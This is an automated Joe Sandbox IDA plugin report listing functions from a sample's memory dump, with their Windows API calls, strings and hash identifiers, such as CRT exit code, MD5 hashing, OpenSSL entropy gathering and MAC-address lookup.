Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
String ID:
API String ID: 1503770280-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 1282695788-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
GetTickCount.KERNEL32 ref: 00481F03
GetTickCount.KERNEL32 ref: 00481FF1
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

Thread32Next, xrefs: 00481E13
Process32First, xrefs: 00481DDA
LanmanServer, xrefs: 00481A74
GetForegroundWindow, xrefs: 00481C4A
KERNEL32.DLL, xrefs: 0048199C
Heap32Next, xrefs: 00481DA1
Module32First, xrefs: 00481E26
GetQueueStatus, xrefs: 00481C6B
Thread32First, xrefs: 00481E00
NETAPI32.DLL, xrefs: 004819A9
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
ADVAPI32.DLL, xrefs: 00481989
Heap32ListNext, xrefs: 00481DC7
CloseToolhelp32Snapshot, xrefs: 00481D7B
Heap32First, xrefs: 00481D8E
LanmanWorkstation, xrefs: 00481A26
$, xrefs: 00481F7E
Module32Next, xrefs: 00481E39
NetApiBufferFree, xrefs: 004819F0
CreateToolhelp32Snapshot, xrefs: 00481D67
GetCursorInfo, xrefs: 00481C58
CryptAcquireContextW, xrefs: 00481AD5
Heap32ListFirst, xrefs: 00481DB4
CryptReleaseContext, xrefs: 00481AF6
CryptGenRandom, xrefs: 00481AE3
NetStatisticsGet, xrefs: 004819E2
Process32Next, xrefs: 00481DED
USER32.DLL, xrefs: 00481C31

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Load$Free$Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 842291066-1723836103
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32(00000000,?), ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

DISPLAY, xrefs: 00482311
.\crypto\rand\rand_win.c, xrefs: 00482383

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(00700000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Address: %s, mac: %s, xrefs: 0040E72D
Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 473631332-1604013687
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

